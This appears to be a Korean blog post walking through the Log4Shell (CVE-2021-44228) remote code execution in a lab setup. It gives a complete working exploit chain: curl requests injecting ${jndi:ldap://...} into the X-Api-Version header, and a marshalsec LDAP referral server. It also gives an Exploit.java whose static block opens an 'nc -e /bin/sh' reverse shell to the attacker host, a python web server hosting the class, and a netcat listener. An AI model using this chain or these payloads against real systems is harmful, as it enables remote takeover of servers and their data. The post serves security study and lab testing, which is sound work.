Log4j 2 RCE (CVE-2021-44228)

글 작성자: heogi

Log4j 2 RCE (CVE-2021-44228)

1. 개요

Log4j는 java 기반 로깅 도구인 Apache 라이브러리이다.

Log4Shell 이라고도하는 이 취약점은 CVE-2021-44228로 식별되며 CVSS(Common Vulnerbility Scoring System)

점수는 최고점인 10점을 받았다.
비교적 공격방법이 쉬운 편에 속하지만 RCE 취약점이고, 다양한 제품에서 해당 라이브러리를 사용한다.

해당 취약점은 JNDI Injection을 통한 RCE로 JNDI Lookup을 구문을 취약한 파라미터에 삽입하여 해당 구문이 로깅되면서 악성 LDAP 서버로 부터 임의의 코드를 받아와서 실행이 되는 취약점이다.

2. 대상

CVE-2021-44228에 취약한 Log4j 2 버전은 아래와 같다.

Apache Log4j 2.0-beta9 ~ 2.14.1

다양한 제품에서 해당 버전의 Log4j를 사용한다. 아래 제품들이 그 리스트이다.

https://github.com/YfryTchsGD/Log4jAttackSurface

GitHub - YfryTchsGD/Log4jAttackSurface

Contribute to YfryTchsGD/Log4jAttackSurface development by creating an account on GitHub.

github.com

3. 분석

* Attack Payload

curl -H 'X-API-Version: ${jndi:ldap://ATTACKER_SERVER/Exploit} VICTIME_SERVER

JNDI이란? - From Wikipedia
JNDI(Java Naming and Directory Interface)는 디렉터리 서비스에서 제공하는 데이터 및 객체를 발견(Discover)하고 참고(Lookup)하기 위한 자바 API이다.
JNDI는 일반적으로 다음의 용도로 사용된다.
- 자바 애플리케이션을 외부 디렉터리 서비스에 연결(예 : 주소 데이터베이스 또는 LDAP 서버)

LDAP이란? - From Wikipedia
LDAP(Lightweight Directory Access Protocol)은 TCP/IP 위에서 디렉토리 서비스를 조회하고 수정하는 프로토콜이다.

위 구문을 해석해보면 HTTP Request의 X-API-Version Header에 jndi 구문을 삽입하는데 해당 jndi 구문은 ldap 프로토콜을 이용해 Attacker_server의 Exploit 클래스를 Lookup한다.

4. 공격 방식 및 실습

* Attack Flow

* 환경 구성

공격 실습을 위해서는 아래 2개의 환경 구축이 필요하다.

취약한 Log4j 서버
악성 LDAP 서버

1. 취약한 Log4j 서버 - 192.168.0.11:8081
아래 구축되어있는 Docker 환경으로 테스트 진행한다.

https://github.com/christophetd/log4shell-vulnerable-app

GitHub - christophetd/log4shell-vulnerable-app: Spring Boot web application vulnerable to Log4Shell (CVE-2021-44228).

Spring Boot web application vulnerable to Log4Shell (CVE-2021-44228). - GitHub - christophetd/log4shell-vulnerable-app: Spring Boot web application vulnerable to Log4Shell (CVE-2021-44228).

github.com

> docker run --rm -p 8081:8080 log4jpwn

해당 환경은 X-API-Version 헤더를 logging 하고 있다.

# MainController.java

@RestController
public class MainController {

    private static final Logger logger = LogManager.getLogger("HelloWorld");

    @GetMapping("/")
    public String index(@RequestHeader("X-Api-Version") String apiVersion) {
        logger.info("Received a request for API version " + apiVersion);
        return "Hello, world!";
    }

}

2. 악성 LDAP 서버 - 192.168.111.129:1389
정확히는 LDAP Refferal Server 인데 작성한 악성 Java Class 파일을 취약한 Log4j 서버로 리다이렉트 해준다.

https://github.com/mbechler/marshalsec

GitHub - mbechler/marshalsec

Contribute to mbechler/marshalsec development by creating an account on GitHub.

github.com

> mvn clean package -DskipTests
> java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://ATTACKER_SERVER:8000/#Exploit"

3. Exploit.class 호스팅 - 192.168.111.129:8000

취약한 Log4j 서버에서 실행될 커맨드를 작성한다. 여기서는 nc를 통해 리버스 쉘을 실행한다.

#Exploit.java
public class Exploit {
    static {
        try {
            java.lang.Runtime.getRuntime().exec("nc 192.168.111.129 9999 -e /bin/sh");
            # 취약한 서버에서 공격자 서버로 리버스 쉘 접속
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

> javac Exploit.java
> ls
Exploit.class
Exploit.java

Exploit.class 파일을 호스팅 하기 위해 아래 python 명령어를 통해 웹서버를 실행한다.

> python3 -m http.server

4. Necat Listener

> nc -lvnp 9999

5. Exploit

#1. X-Api-Version Header에 악성 페이로드로 Log4j 서버로 요청 전송
> curl -H 'X-Api-Version: ${jndi:ldap://192.168.111.129:1389/Exploit}' 192.168.0.11:8081

#2. Log4j 서버는 악성 LDAP Refferal Server에 Exploit.class 요청
#3. LDAP Refferal Server에서 Exploit.class 파일을 Log4j 서버로 전송
#4. Log4j 서버에서 Exploit.class 파일 실행

# 1

# 3

익스플로잇에 성공하여 취약한 Log4j 서버의 쉘을 획득한 것을 볼 수 있다.

Log4j 2 RCE (CVE-2021-44228)